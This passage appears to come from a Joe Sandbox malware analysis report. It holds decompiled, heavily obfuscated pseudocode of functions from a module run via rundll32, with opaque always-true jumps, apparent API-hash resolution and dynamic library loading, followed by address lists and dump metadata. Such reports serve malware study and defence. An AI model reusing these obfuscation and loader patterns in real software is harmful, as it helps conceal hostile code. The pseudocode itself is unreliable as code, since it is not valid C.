				if (__esi == __esi) goto 0x65c5375b;
				r8d = r8d + 2;
				if (0xd45a1e1f == 0xd45a1e1f) goto 0x65c53767;
				if (0x67cc0818 == 0x67cc0818) goto 0x65c5372f;
				_t143 = _a56;
				E00007FFA7FFA65C58D0B(_t65, 0x67cc0818, __esi, _t101, __esp, _t129, _a56,  &_a36, _t156, _t157, _t158, _t160, _t162, _t163, _t164, _t165, _t166, _t167);
				_a96();
				_t87 = _a33;
				E00007FFA7FFA65C53D78(_t87, __esp, _t129, _t140, _t143,  &_a36, _t157, _t158, _t162, _t166, _t167);
				if (_t87 == _t87) goto 0x65c537c0;
				_t70 = _t87;
				if (_t92 == _t92) goto 0x65c5379e;
				_t154 = _a136;
				if (__ebx == __ebx) goto 0x65c53776;
				_t71 = _t70 << 4;
				_a64 = _t71;
				if (_t71 == _t71) goto 0x65c53786;
				if ((_a64 | _t71) == (_a64 | _t71)) goto 0x65c53793;
				_t155 =  *_t154;
				 *(_t155 +  *((intOrPtr*)(_t129 + 0x30))) = _t71;
				goto 0x65c537d7;
				goto 0x65c539c6;
				if (_a48 - _t129 >= 0) goto 0x65c537d7;
				_t130 = _a48;
				goto 0x65c537f2;
				goto 0x65c5395d;
				_a80 = _t130;
				E00007FFA7FFA65C5A588(1, _t140, _t155, _t156, _t162, _t163, _t164, _t166, _t168);
				if (__edi == __edi) goto 0x65c5381a;
				_t161 = _a56 + _t130;
				if (__ebx == __ebx) goto 0x65c53828;
				if (__esp == __esp) goto 0x65c5380e;
				if (__esp == __esp) goto 0x65c53834; // executed
				RtlAllocateHeap(??, ??, ??);
				if (__edi == __edi) goto 0x65c53854;
				_t132 = _a136;
				_t76 =  *((intOrPtr*)(_t132 + 8));
				if (__ebx == __ebx) goto 0x65c537ff;
				 *_a136 = _t132;
				_t133 = _a136;
				r8d = r8d + 0xf;
				if (0 == 0) goto 0x65c5386e;
				_t152 = _a136;
				_t77 = E00007FFA7FFA65C58E8D(_t76, _t140, _t152, _t155, _t156, _t157, _t158, _t161, _t162, _t164, _t165, _t166, _t167, _t168);
				if (0 == 0) goto 0x65c538b6;
				_a36 = _a36 + 0x24;
				_a37 = 5;
				goto 0x65c53898;
				_a37 = _a37 + 0x73;
				r8d = 0;
				goto 0x65c5374d;
				_a56 = _t133;
				_a36 = 0xc;
				if (_t77 == _t77) goto 0x65c5388c;
				_t78 = _t77 / _t152;
				if (_t78 == _t78) goto 0x65c53880;
				_a72 = _a40;
				goto 0x65c5391b;
				_t159 = _t159 - 0x78;
				goto 0x65c53b2c;
				_v104 = _t155;
				_v112 = _t152;
				if (__esi == __esi) goto 0x65c538d3;
				_t152 =  *_a8;
				E00007FFA7FFA65C590C0( *((intOrPtr*)(_a40 + 8)), _a8, _t140,  *_a8, _t155, _t156, _t157, _t162, _t163, _t164, _t165, _t167, _t168);
				goto 0x65c53b3f;
				goto 0x65c538a8;
				if ( *_a8 == 0) goto 0x65c53900;
				_t78 = 0;
				goto 0x65c53900;
				_v80 = _v48;
				goto L8;
				_v87 = __al;
				goto 0x65c53b1e;
				__rcx = _a16;
				__eax = E00007FFA7FFA65C58E8D(__eax, __rbx, __rcx, __rdx, __rdi, __rsi, __rbp, __r8, __r9, __r11, __r12, __r13, __r14, __r15);
				if (__ah == __ah) goto 0x65c5399d;
				_v88 = __al;
				__rax = _v72;
				if (__dx == __dx) goto 0x65c53990;
				r8d = r8d + 0xf;
				__edx = 0;
				if (__dl == __dl) goto 0x65c53934;
				__rax = __rcx;
				__al =  *__rax;
				if (__bx == __bx) goto 0x65c53945;
				__rcx = _a16;
				__r8 =  *__rcx;
				__eax = E00007FFA7FFA65C53B56(__ecx, 0, __ebp, __rax, __rdx, __rsi, __rbp, __r8, __r11, __r13, __r14);
				goto 0x65c53b0f;
				__rax = __rcx;
				__al =  *((intOrPtr*)(__rax + 1));
				if (__di == __di) goto 0x65c53927;
				_v64 = _v64 + __rax;
				if (__ax == __ax) goto 0x65c53985;
				__eax = E00007FFA7FFA65C5A588(__eax, __rbx, __rdx, __rdi, __r9, __r10, __r11, __r13, __r15);
				__rax =  *((intOrPtr*)(__rax + 0x60));
				goto 0x65c53967;
				if (__eax != 0) goto 0x65c539b9;
				if (_v80 - 2 < 0) goto 0x65c539b9;
				goto E00007FFA7FFA65C536FA;
				_v80 = _v80 >> 1;
				goto 0x65c5373d;
				__rsp = __rsp + 0x78;
				return __eax;
			}













































      0x7ffa65c536fa
      0x7ffa65c536ff
      0x7ffa65c53706
      0x7ffa65c53708
      0x7ffa65c5370d
      0x7ffa65c53712
      0x7ffa65c5371f
      0x7ffa65c53721
      0x7ffa65c53726
      0x7ffa65c5372d
      0x7ffa65c5372f
      0x7ffa65c53734
      0x7ffa65c5373b
      0x7ffa65c53745
      0x7ffa65c5374b
      0x7ffa65c5374d
      0x7ffa65c53759
      0x7ffa65c53765
      0x7ffa65c53767
      0x7ffa65c5376c
      0x7ffa65c53776
      0x7ffa65c53786
      0x7ffa65c5378a
      0x7ffa65c53791
      0x7ffa65c53793
      0x7ffa65c5379c
      0x7ffa65c537a1
      0x7ffa65c537b3
      0x7ffa65c537b5
      0x7ffa65c537b8
      0x7ffa65c537be
      0x7ffa65c537c8
      0x7ffa65c537ca
      0x7ffa65c537cd
      0x7ffa65c537d5
      0x7ffa65c537df
      0x7ffa65c537e9
      0x7ffa65c537eb
      0x7ffa65c537f0
      0x7ffa65c537fa
      0x7ffa65c537ff
      0x7ffa65c53804
      0x7ffa65c5380c
      0x7ffa65c5380e
      0x7ffa65c53818
      0x7ffa65c53826
      0x7ffa65c53832
      0x7ffa65c53834
      0x7ffa65c53843
      0x7ffa65c53845
      0x7ffa65c5384d
      0x7ffa65c53852
      0x7ffa65c53854
      0x7ffa65c53857
      0x7ffa65c53864
      0x7ffa65c5386c
      0x7ffa65c5386e
      0x7ffa65c53876
      0x7ffa65c5388a
      0x7ffa65c5388c
      0x7ffa65c53891
      0x7ffa65c53896
      0x7ffa65c53898
      0x7ffa65c5389d
      0x7ffa65c538a3
      0x7ffa65c538a8
      0x7ffa65c538ad
      0x7ffa65c538b4
      0x7ffa65c538b6
      0x7ffa65c538c7
      0x7ffa65c538cc
      0x7ffa65c538d1
      0x7ffa65c538d3
      0x7ffa65c538df
      0x7ffa65c538e4
      0x7ffa65c538e9
      0x7ffa65c538f1
      0x7ffa65c538f3
      0x7ffa65c538f6
      0x7ffa65c538fb
      0x7ffa65c5390b
      0x7ffa65c53910
      0x7ffa65c53912
      0x7ffa65c53919
      0x7ffa65c53920
      0x7ffa65c53925
      0x7ffa65c53927
      0x7ffa65c5392f
      0x7ffa65c53934
      0x7ffa65c5393c
      0x7ffa65c53943
      0x7ffa65c53945
      0x7ffa65c53949
      0x7ffa65c53951
      0x7ffa65c53953
      0x7ffa65c53957
      0x7ffa65c5395b
      0x7ffa65c5395d
      0x7ffa65c53960
      0x7ffa65c53965
      0x7ffa65c53967
      0x7ffa65c5396f
      0x7ffa65c5397b
      0x7ffa65c53980
      0x7ffa65c53985
      0x7ffa65c53988
      0x7ffa65c5398e
      0x7ffa65c53995
      0x7ffa65c5399b
      0x7ffa65c5399d
      0x7ffa65c539a2
      0x7ffa65c539a6
      0x7ffa65c539aa
      0x7ffa65c539b2
      0x7ffa65c539b4
      0x7ffa65c539be
      0x7ffa65c539c1
      0x7ffa65c539c6
      0x7ffa65c539ca

      Memory Dump Source
      • Source File: 00000003.00000002.432207126.00007FFA65C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA65C50000, based on PE: true
      • Associated: 00000003.00000002.432202126.00007FFA65C50000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000003.00000002.432372505.00007FFA65CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ffa65c50000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: a0d91fdd5af79526e3923e3149c9a47a0b6a76bd8d68c7b7180e430b89e6b421
      • Instruction ID: 70f0e49089979b9ab97185af633e2a2f9cdfccadbacfd0d51cbf35581ec70845
      • Opcode Fuzzy Hash: a0d91fdd5af79526e3923e3149c9a47a0b6a76bd8d68c7b7180e430b89e6b421
      • Instruction Fuzzy Hash: E831C267D1CA86C9EB709F95D45037DA7A1EB82F82F94C036D78E47B94CE2CD8A48700
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00007FFA65C531F1 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 72%
      			E00007FFA7FFA65C531F1(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __ebp, void* __esp, void* __rdx, void* __rdi, void* __rsi, void* __rbp, void* __r8, void* __r9, void* __r10, void* __r14, void* __r15, void* _a48, char _a72, short _a80, short _a82, short _a84, short _a86, short _a88, signed long long _a296, signed long long _a304, char _a320, char _a321, unsigned int _a328, signed long long _a336, intOrPtr _a344, unsigned int _a360, void* _a368, intOrPtr* _a416, signed long long _a424, intOrPtr _a441, char _a444, char _a445, signed long long _a448, unsigned int _a456, signed int _a460, signed long long _a464, signed int _a472, signed long long _a480, signed long long _a482, signed long long _a484, signed long long _a486, signed long long _a488, signed long long _a496, signed long long _a504, signed long long* _a544, intOrPtr _a552, intOrPtr _a556, intOrPtr _a560, intOrPtr _a564, intOrPtr _a568, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, intOrPtr _a584, intOrPtr _a588, intOrPtr _a592, intOrPtr _a632, intOrPtr _a636, intOrPtr _a640, intOrPtr _a648, intOrPtr _a652, intOrPtr _a656, intOrPtr _a660, intOrPtr _a664, intOrPtr _a668, intOrPtr _a672, intOrPtr _a676, intOrPtr _a716, intOrPtr _a720, intOrPtr _a724, intOrPtr _a728, intOrPtr _a732, intOrPtr _a736, intOrPtr _a740, intOrPtr _a744, intOrPtr _a748, intOrPtr _a752, intOrPtr _a756, intOrPtr _a760, intOrPtr _a764, intOrPtr _a768, signed long long _a776) {
				struct HINSTANCE__* _t207;
				signed int _t215;
				void* _t216;
				signed int _t221;
				signed long long _t274;
				void* _t279;

				_t274 =  &_a72;
				_t207 = LoadLibraryW(??);
				if (_t207 == _t207) goto 0x65c5324d;
				_a86 = _t207 + 0x1e;
				if (__ebx == __ebx) goto 0x65c5320d;
				_a88 = 0;
				if (__ecx == __ecx) goto 0x65c531f1;
				_a84 = 0;
				if (__ecx == __ecx) goto 0x65c53201;
				if (0x33 == 0x33) goto 0x65c53218;
				_a80 = 0x33;
				if (__edx == __edx) goto 0x65c53241;
				_a82 = 0x69;
				if (__ebx == __ebx) goto 0x65c53226;
				if (__ebp == __ebp) goto 0x65c531e5;
				_t215 = 0x69 +  *((intOrPtr*)(_t279 + 0xf0 + _t274 * 4));
				if (0x57 - 0x1f4 <= 0) goto 0x65c53276;
				 *((intOrPtr*)(_t279 + 0x70 + _t274 * 4)) = 0x57;
				goto 0x65c5310c;
				goto 0x65c5361e;
				_t216 = _t215 + 1;
				_t279 = _t279 + 0x198;
				goto 0x65c52f67;
				_a560 = _a560 + 4;
				_a564 = 0x9a;
				if (__esi == __esi) goto 0x65c5336a;
				_a568 = _a568 + 0x18;
				_a572 = 0xd;
				if (__ebp == __ebp) goto 0x65c5333a;
				_a588 = _a588 + 2;
				_a592 = 0x19e8;
				goto E00007FFA7FFA65C52E95;
				_a584 = _a584 + 0x3b;
				_a588 = 0x17;
				goto 0x65c532c3;
				_a580 = _a580 + 0x5e;
				_a584 = 0x1b;
				if (_t216 == _t216) goto 0x65c532db;
				_a556 = _a556 + 7;
				_a560 = 0x3f;
				if (0x2733d478 == 0x2733d478) goto 0x65c5328f;
				_a576 = _a576 + 0x18;
				_a580 = 0x1af;
				if (__ebp == __ebp) goto 0x65c532f0;
				_a572 = _a572 + 0xb;
				_a576 = 0x3e;
				if (0x2733d478 == 0x2733d478) goto 0x65c53322;
				_a552 = _a552 + 0x54;
				_a556 = 0x12;
				if (__ebx == __ebx) goto 0x65c53307;
				_a564 = _a564 + 0x5b;
				_a568 = 0x3e;
				if (__ebp == __ebp) goto 0x65c532ab;
				_a672 = _a672 + 0x40;
				_a676 = 0x111;
				goto E00007FFA7FFA65C53087;
				_a636 = _a636 + 0xa;
				_a640 = 0x25;
				if (_t216 == _t216) goto 0x65c533d0;
				_a652 = _a652 + 0x85;
				_a656 = 0x182e;
				if (0x2733d478 == 0x2733d478) goto 0x65c533ff;
				_a640 = _a640 + 5;
				_a648 = 0x332;
				if (__esi == __esi) goto 0x65c53450;
				_a660 = _a660 + 0x3a;
				_a664 = 0x9e;
				if (_t216 == _t216) goto 0x65c5346b;
				_a656 = _a656 + 0xf4;
				_a660 = 0x12;
				if (_t216 == _t216) goto 0x65c533e8;
				_a668 = _a668 + 0x8b;
				_a672 = 0x16;
				goto 0x65c53386;
				_a632 = _a632 + 0x2d;
				_a636 = 0x41;
				if (_t216 == _t216) goto 0x65c5339e;
				_a648 = _a648 + 3;
				_a652 = 0xc0;
				if (_t216 == _t216) goto 0x65c533b6;
				_a664 = _a664 + 0xce;
				_a668 = 0x1cf6;
				if (__edx == __edx) goto 0x65c53419;
				asm("dec eax");
				asm("in al, 0x63");
				asm("dec eax");
				asm("dec eax");
				_a744 = _a744;
				_a748 = 0xd9;
				if (__edx == __edx) goto 0x65c534db;
				_a748 = _a748 + 0x81;
				_a752 = 0x18f;
				goto 0x65c5358a;
				_a724 = _a724 + 0x8f;
				_a728 = 0x24b;
				if (__edx == __edx) goto 0x65c53558;
				_a732 = _a732 + 0x3c;
				_a736 = 6;
				if (__edx == __edx) goto 0x65c53541;
				_a716 = _a716 + 0x12;
				_a720 = 0x19cc;
				if (__edx == __edx) goto 0x65c535a2;
				_a736 = _a736 + 0x27;
				_a740 = 0x35;
				if (__edx == __edx) goto 0x65c5356f;
				_a728 = _a728 + 0x30;
				_a732 = 0x1d29;
				if (__edx == __edx) goto 0x65c53511;
				_a740 = _a740 + 0x17;
				_a744 = 0x7b;
				if (__edx == __edx) goto 0x65c534c3;
				_a752 = _a752 + 0xff;
				_a756 = 9;
				goto 0x65c535c0;
				_a720 = _a720 + 0xa0;
				_a724 = 0x5c;
				if (__edx == __edx) goto 0x65c534f6;
				_a756 = _a756 + 0x10;
				_a760 = 0x1f;
				if (0x2733d478 == 0x2733d478) goto 0x65c53631;
				_a764 = _a764 + 0xf;
				_a768 = 0x27;
				if (0x2733d478 == 0x2733d478) goto 0x65c535f7;
				asm("cdq");
				if (__ebp == __ebp) goto 0x65c53649;
				_a768 = _a768 + 3;
				_a456 = 0;
				goto 0x65c530ef;
				goto 0x65c52f9f;
				if (__ebx == __ebx) goto 0x65c535ef;
				goto 0x65c53663;
				_t221 = ( *(_t279 + 0x70 + _a456 * 4) << 1) + 1;
				_a460 = _t221;
				goto 0x65c530fb;
				_a760 = _a760 + 0x24;
				_a764 = 0x3c;
				if (__edi == __edi) goto 0x65c535d7;
				_t215 = _t221 >> 1;
				_t274 = _a456;
				goto L1;
				__rcx = _a460;
				__eax =  *(__rsp + 0x70 + __rax * 4);
				goto 0x65c5325a;
				__rcx = _a456;
				 *(__rsp + 0x70 + __rcx * 4) =  *(__rsp + 0x70 + __rax * 4);
				goto 0x65c5310c;
				_a484 = __ax;
				__eax = 0x2f;
				if (__bh == __bh) goto 0x65c536dd;
				__eax = 0x8b;
				_a482 = __ax;
				if (__cx == __cx) goto 0x65c5368c;
				0x72 = 0x76;
				if (__bh == __bh) goto 0x65c53671;
				__ecx = 0x7d676da;
				__ecx = 0x7d6774c;
				if (__ch == __ch) goto 0x65c536b0;
				__eax = 0x2f;
				__eax = 0x61;
				if (__dh == __dh) goto 0x65c536c1;
				__eax = E00007FFA7FFA65C57947(0x61, __ebx, 0x7d6774c, __edx, __edi, __esi, __rax, __rbx, __rcx, __rsi, __r8, __r9, __r11, __r13, __r15);
				_a776 = __rax;
				if (__dl == __dl) goto 0x65c536a4;
				_a480 = __ax;
				__eax = 8;
				if (__dx == __dx) goto 0x65c5367f;
				0x11 = 0x70;
				goto 0x65c53232;
				__eax = 0xa2;
				_a486 = __ax;
				_a448 = __rax;
				__rax = _a464;
				__rax = _a464 + 2;
				if (__sp == __sp) goto 0x65c53721;
				__eax = E00007FFA7FFA65C57947(0xa2, __ebx, 0x7d6774c, __edx, __edi, __esi, __rax, __rbx, __rcx, __rsi, __r8, __r9, __r11, __r13, __r15);
				_a504 = __rax;
				goto 0x65c53845;
				__ecx = 0xd45a1e90;
				__ecx = 0xd45a1e1f;
				goto 0x65c53708;
				_a464 = __rax;
				__rax = _a448;
				if (__ah == __ah) goto 0x65c536ec;
				__eax = E00007FFA7FFA65C57947(__eax, __ebx, 0xd45a1e1f, __edx, __edi, __esi, __rax, __rbx, __rcx, __rsi, __r8, __r9, __r11, __r13, __r15);
				_a496 = __rax;
				if (__dh == __dh) goto 0x65c53717;
				__rcx = _a544;
				_a544[1] = __eax;
				if (__si == __si) goto 0x65c5375b;
				r8d = r8d + 2;
				__rdx =  &_a444;
				if (__cx == __cx) goto 0x65c53767;
				__ecx = 0x67cc07ec;
				__ecx = 0x67cc0818;
				if (__cl == __cl) goto 0x65c5372f;
				__rcx = _a464;
				__eax = E00007FFA7FFA65C58D0B(__eax, 0x67cc0818, __esi, __ebp, __esp, __rax, __rcx, __rdx, __rdi, __rsi, __rbp, __r8, __r9, __r10, __r11, __r12, __r13, __r14);
				_a504() = 0;
				__cl = _a441;
				__eax = E00007FFA7FFA65C53D78(__ecx, __esp, __rax, __rbx, __rcx, __rdx, __rsi, __rbp, __r9, __r13, __r14);
				if (__cl == __cl) goto 0x65c537c0;
				__eax = __ecx;
				__rcx = _a456;
				if (__dh == __dh) goto 0x65c5379e;
				__rcx = _a456 >> 1;
				__rdx = _a544;
				__edx = 0;
				__rcx =  *((intOrPtr*)(__rax + 0x30));
				if (__bh == __bh) goto 0x65c53776;
				__eax = __eax << 4;
				_a472 = __eax;
				if (__ah == __ah) goto 0x65c53786;
				_a472 = _a472 | __eax;
				if (__cl == __cl) goto 0x65c53793;
				__rdx =  *__rdx;
				 *((char*)(__rdx +  *((intOrPtr*)(__rax + 0x30)))) = __al;
				goto 0x65c537d7;
				__eax = 0;
				__eax = 1;
				goto 0x65c539c6;
				if (_a456 - __rax >= 0) goto 0x65c537d7;
				__rax = _a456;
				goto 0x65c537f2;
				_a464 = _a464 + __rax;
				goto 0x65c5395d;
				_a488 = __rax;
				__eax = E00007FFA7FFA65C5A588(1, __rbx, __rdx, __rdi, __r9, __r10, __r11, __r13, __r15);
				if (__di == __di) goto 0x65c5381a;
				__r8 = __rcx;
				__edx = 3;
				if (__bl == __bl) goto 0x65c53828;
				__rax =  *((intOrPtr*)(__rax + 0x60));
				__rcx = _a488;
				if (__sp == __sp) goto 0x65c5380e;
				__edx = 8;
				__rcx =  *((intOrPtr*)(__rax + 0x30));
				if (__sp == __sp) goto 0x65c53834; // executed
				__eax = RtlAllocateHeap(??, ??, ??);
				__rcx = _a544;
				if (__di == __di) goto 0x65c53854;
				__rax = _a544;
				__eax =  *(__rax + 8);
				if (__bl == __bl) goto 0x65c537ff;
				 *_a544 = __rax;
				__rax = _a544;
				r8d = r8d + 0xf;
				__edx = 0;
				if (__dh == __dh) goto 0x65c5386e;
				__rcx = _a544;
				__eax = E00007FFA7FFA65C58E8D(__eax, __rbx, __rcx, __rdx, __rdi, __rsi, __rbp, __r8, __r9, __r11, __r12, __r13, __r14, __r15);
				__ecx = 2;
				__ecx = 2;
				if (__dl == __dl) goto 0x65c538b6;
				_a444 = _a444 + 0x24;
				_a445 = 5;
				goto 0x65c53898;
				_a445 = _a445 + 0x73;
				r8d = 0;
				goto 0x65c5374d;
				_a464 = __rax;
				_a444 = 0xc;
				if (__ah == __ah) goto 0x65c5388c;
				_t183 = __eax % __rcx;
				__eax = __eax / __rcx;
				__edx = _t183;
				__rax = __rdx;
				__edx = 0;
				__rax = _a448;
				if (__ah == __ah) goto 0x65c53880;
				__eax =  *(__rax + 8);
				_a480 = __rax;
				goto 0x65c5391b;
				__rsp = __rsp - 0x78;
				__rax = _a416;
				goto 0x65c53b2c;
				_a304 = __rdx;
				_a296 = __rcx;
				if (__si == __si) goto 0x65c538d3;
				__rcx =  *__rax;
				__eax = E00007FFA7FFA65C590C0(__eax, __rax, __rbx,  *__rax, __rdx, __rdi, __rsi, __r9, __r10, __r11, __r12, __r14, __r15);
				goto 0x65c53b3f;
				_a416 =  *_a416;
				goto 0x65c538a8;
				if ( *_a416 == 0) goto 0x65c53900;
				__eax = 0;
				goto 0x65c53900;
				__rax = _a360;
				_a328 = _a360;
				goto L12;
				_a321 = __al;
				__cl = _a320;
				goto 0x65c53b1e;
				__rcx = _a424;
				__eax = E00007FFA7FFA65C58E8D(0, __rbx, __rcx, __rdx, __rdi, __rsi, __rbp, __r8, __r9, __r11, __r12, __r13, __r14, __r15);
				if (__ah == __ah) goto 0x65c5399d;
				_a320 = __al;
				__rax = _a336;
				if (__dx == __dx) goto 0x65c53990;
				r8d = r8d + 0xf;
				__edx = 0;
				if (__dl == __dl) goto 0x65c53934;
				__rax = __rcx;
				__al =  *__rax;
				if (__bx == __bx) goto 0x65c53945;
				__rcx = _a424;
				__r8 =  *__rcx;
				__cl = _a321;
				__eax = E00007FFA7FFA65C53B56(2, 0, __ebp, __rax, __rdx, __rsi, __rbp, __r8, __r11, __r13, __r14);
				goto 0x65c53b0f;
				__rax = __rcx;
				__al =  *((intOrPtr*)(__rax + 1));
				if (__di == __di) goto 0x65c53927;
				_a344 = _a344 + __rax;
				if (__ax == __ax) goto 0x65c53985;
				__eax = E00007FFA7FFA65C5A588(__eax, __rbx, __rdx, __rdi, __r9, __r10, __r11, __r13, __r15);
				__rax =  *((intOrPtr*)(__rax + 0x60));
				goto 0x65c53967;
				if (__eax != 0) goto 0x65c539b9;
				if (_a328 - 2 < 0) goto 0x65c539b9;
				goto L4;
				_a328 = _a328 >> 1;
				goto 0x65c5373d;
				__rsp = __rsp + 0x78;
				return __eax;
			}









      0x7ffa65c531f1
      0x7ffa65c531f6
      0x7ffa65c531ff
      0x7ffa65c53204
      0x7ffa65c5320b
      0x7ffa65c5320f
      0x7ffa65c53216
      0x7ffa65c53218
      0x7ffa65c53224
      0x7ffa65c53230
      0x7ffa65c53232
      0x7ffa65c5323f
      0x7ffa65c53244
      0x7ffa65c5324b
      0x7ffa65c53258
      0x7ffa65c5325a
      0x7ffa65c53266
      0x7ffa65c5326d
      0x7ffa65c53271
      0x7ffa65c5327b
      0x7ffa65c53280
      0x7ffa65c53283
      0x7ffa65c5328a
      0x7ffa65c5328f
      0x7ffa65c53297
      0x7ffa65c532a5
      0x7ffa65c532ab
      0x7ffa65c532b3
      0x7ffa65c532c1
      0x7ffa65c532c3
      0x7ffa65c532cb
      0x7ffa65c532d6
      0x7ffa65c532db
      0x7ffa65c532e3
      0x7ffa65c532ee
      0x7ffa65c532f0
      0x7ffa65c532f8
      0x7ffa65c53305
      0x7ffa65c53307
      0x7ffa65c5330f
      0x7ffa65c5331c
      0x7ffa65c53322
      0x7ffa65c5332a
      0x7ffa65c53338
      0x7ffa65c5333a
      0x7ffa65c53342
      0x7ffa65c53350
      0x7ffa65c53352
      0x7ffa65c5335a
      0x7ffa65c53368
      0x7ffa65c5336a
      0x7ffa65c53372
      0x7ffa65c53380
      0x7ffa65c53386
      0x7ffa65c5338e
      0x7ffa65c53399
      0x7ffa65c5339e
      0x7ffa65c533a6
      0x7ffa65c533b4
      0x7ffa65c533b6
      0x7ffa65c533c1
      0x7ffa65c533ce
      0x7ffa65c533d0
      0x7ffa65c533d8
      0x7ffa65c533e6
      0x7ffa65c533e8
      0x7ffa65c533f0
      0x7ffa65c533fd
      0x7ffa65c533ff
      0x7ffa65c5340a
      0x7ffa65c53417
      0x7ffa65c53419
      0x7ffa65c53424
      0x7ffa65c5342f
      0x7ffa65c53434
      0x7ffa65c5343c
      0x7ffa65c5344a
      0x7ffa65c53450
      0x7ffa65c53458
      0x7ffa65c53465
      0x7ffa65c5346b
      0x7ffa65c53476
      0x7ffa65c53483
      0x7ffa65c53493
      0x7ffa65c534a3
      0x7ffa65c534b6
      0x7ffa65c534bc
      0x7ffa65c534c3
      0x7ffa65c534cb
      0x7ffa65c534d9
      0x7ffa65c534db
      0x7ffa65c534e6
      0x7ffa65c534f1
      0x7ffa65c534f6
      0x7ffa65c53501
      0x7ffa65c5350f
      0x7ffa65c53511
      0x7ffa65c53519
      0x7ffa65c53527
      0x7ffa65c53529
      0x7ffa65c53531
      0x7ffa65c5353f
      0x7ffa65c53541
      0x7ffa65c53549
      0x7ffa65c53556
      0x7ffa65c53558
      0x7ffa65c53560
      0x7ffa65c5356d
      0x7ffa65c5356f
      0x7ffa65c53577
      0x7ffa65c53584
      0x7ffa65c5358a
      0x7ffa65c53595
      0x7ffa65c535a0
      0x7ffa65c535a2
      0x7ffa65c535ad
      0x7ffa65c535ba
      0x7ffa65c535c0
      0x7ffa65c535c8
      0x7ffa65c535d5
      0x7ffa65c535d7
      0x7ffa65c535df
      0x7ffa65c535ed
      0x7ffa65c535ef
      0x7ffa65c535f5
      0x7ffa65c535f7
      0x7ffa65c535ff
      0x7ffa65c53607
      0x7ffa65c5360c
      0x7ffa65c5361c
      0x7ffa65c53624
      0x7ffa65c53626
      0x7ffa65c53628
      0x7ffa65c5362c
      0x7ffa65c53631
      0x7ffa65c53639
      0x7ffa65c53647
      0x7ffa65c53649
      0x7ffa65c5364b
      0x7ffa65c53650
      0x7ffa65c53655
      0x7ffa65c5365a
      0x7ffa65c5365e
      0x7ffa65c53663
      0x7ffa65c53668
      0x7ffa65c5366c
      0x7ffa65c53671
      0x7ffa65c53676
      0x7ffa65c5367d
      0x7ffa65c5367f
      0x7ffa65c53682
      0x7ffa65c5368a
      0x7ffa65c53691
      0x7ffa65c53696
      0x7ffa65c53698
      0x7ffa65c5369d
      0x7ffa65c536a2
      0x7ffa65c536a4
      0x7ffa65c536a9
      0x7ffa65c536ae
      0x7ffa65c536b0
      0x7ffa65c536b5
      0x7ffa65c536bf
      0x7ffa65c536c1
      0x7ffa65c536c6
      0x7ffa65c536ce
      0x7ffa65c536d5
      0x7ffa65c536d8
      0x7ffa65c536dd
      0x7ffa65c536e0
      0x7ffa65c536f0
      0x7ffa65c536fa
      0x7ffa65c536ff
      0x7ffa65c53706
      0x7ffa65c53708
      0x7ffa65c5370d
      0x7ffa65c53712
      0x7ffa65c53717
      0x7ffa65c5371c
      0x7ffa65c5371f
      0x7ffa65c53721
      0x7ffa65c53726
      0x7ffa65c5372d
      0x7ffa65c5372f
      0x7ffa65c53734
      0x7ffa65c5373b
      0x7ffa65c5373d
      0x7ffa65c53745
      0x7ffa65c5374b
      0x7ffa65c5374d
      0x7ffa65c53751
      0x7ffa65c53759
      0x7ffa65c5375b
      0x7ffa65c53760
      0x7ffa65c53765
      0x7ffa65c53767
      0x7ffa65c5376c
      0x7ffa65c5377a
      0x7ffa65c53786
      0x7ffa65c5378a
      0x7ffa65c53791
      0x7ffa65c53793
      0x7ffa65c53795
      0x7ffa65c5379c
      0x7ffa65c5379e
      0x7ffa65c537a1
      0x7ffa65c537ab
      0x7ffa65c537ad
      0x7ffa65c537b3
      0x7ffa65c537b5
      0x7ffa65c537b8
      0x7ffa65c537be
      0x7ffa65c537c4
      0x7ffa65c537c8
      0x7ffa65c537ca
      0x7ffa65c537cd
      0x7ffa65c537d5
      0x7ffa65c537d7
      0x7ffa65c537dc
      0x7ffa65c537df
      0x7ffa65c537e9
      0x7ffa65c537eb
      0x7ffa65c537f0
      0x7ffa65c537f7
      0x7ffa65c537fa
      0x7ffa65c537ff
      0x7ffa65c53804
      0x7ffa65c5380c
      0x7ffa65c5380e
      0x7ffa65c53811
      0x7ffa65c53818
      0x7ffa65c5381a
      0x7ffa65c5381e
      0x7ffa65c53826
      0x7ffa65c53828
      0x7ffa65c5382b
      0x7ffa65c53832
      0x7ffa65c53834
      0x7ffa65c53838
      0x7ffa65c53843
      0x7ffa65c53845
      0x7ffa65c5384d
      0x7ffa65c53852
      0x7ffa65c53854
      0x7ffa65c53857
      0x7ffa65c53864
      0x7ffa65c53868
      0x7ffa65c5386c
      0x7ffa65c5386e
      0x7ffa65c53876
      0x7ffa65c53880
      0x7ffa65c53885
      0x7ffa65c5388a
      0x7ffa65c5388c
      0x7ffa65c53891
      0x7ffa65c53896
      0x7ffa65c53898
      0x7ffa65c5389d
      0x7ffa65c538a3
      0x7ffa65c538a8
      0x7ffa65c538ad
      0x7ffa65c538b4
      0x7ffa65c538b6
      0x7ffa65c538b6
      0x7ffa65c538b6
      0x7ffa65c538b9
      0x7ffa65c538be
      0x7ffa65c538c0
      0x7ffa65c538c7
      0x7ffa65c538c9
      0x7ffa65c538cc
      0x7ffa65c538d1
      0x7ffa65c538d3
      0x7ffa65c538d7
      0x7ffa65c538df
      0x7ffa65c538e4
      0x7ffa65c538e9
      0x7ffa65c538f1
      0x7ffa65c538f3
      0x7ffa65c538f6
      0x7ffa65c538fb
      0x7ffa65c53908
      0x7ffa65c5390b
      0x7ffa65c53910
      0x7ffa65c53912
      0x7ffa65c53919
      0x7ffa65c5391b
      0x7ffa65c53920
      0x7ffa65c53925
      0x7ffa65c53927
      0x7ffa65c5392b
      0x7ffa65c5392f
      0x7ffa65c53934
      0x7ffa65c5393c
      0x7ffa65c53943
      0x7ffa65c53945
      0x7ffa65c53949
      0x7ffa65c53951
      0x7ffa65c53953
      0x7ffa65c53957
      0x7ffa65c5395b
      0x7ffa65c5395d
      0x7ffa65c53960
      0x7ffa65c53965
      0x7ffa65c53967
      0x7ffa65c5396f
